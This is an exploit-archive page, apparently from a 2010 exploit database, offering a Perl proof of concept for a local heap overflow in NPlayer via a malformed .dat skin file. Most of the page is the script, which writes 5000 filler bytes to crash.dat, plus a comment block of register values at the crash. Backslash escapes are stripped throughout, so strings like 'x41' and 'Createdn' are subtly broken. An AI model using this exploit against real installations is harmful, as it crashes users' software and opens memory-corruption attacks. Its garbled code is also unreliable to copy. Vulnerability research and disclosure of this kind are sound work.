NPlayer (.dat Skin File) Local Heap Overflow PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : NPlayer (.dat Skin File) Local Heap Overflow PoC
# Published : 2010-01-13
# Author : Rehan Ahmed
# Previous Title : TurboFTP Server 1.00.712 Remote DoS
# Next Title : Nuked KLan <= 1.7.7 & <= SP4 DOS

#!/usr/bin/perl
#Exploit Title:NPlayer (.dat Skin File) Local Heap Overflow PoC
#Date:13/01/2010
#Author:Vulnerability Discovered By Rehan Ahmed (rehan@rewterz.com)
#Tested On: WinXP SP2
########################################################################################
##EBX 41414141
##ESP 0012EF6C
##EBP 00DA50F8 ASCII "C:Program Filesn.playerskinscrash.dat"
##ESI 0012EFD8
##EDI 014143F8
##EIP 7C90EAF0 ntdll.7C90EAF0
#######################################################################################
########################################################################################
my $boom="x41" x 5000;
my $file="crash.dat";
open($FILE,">$file");
print $FILE $boom;
close($FILE);
print "File Successfully Createdn";
########################################################################################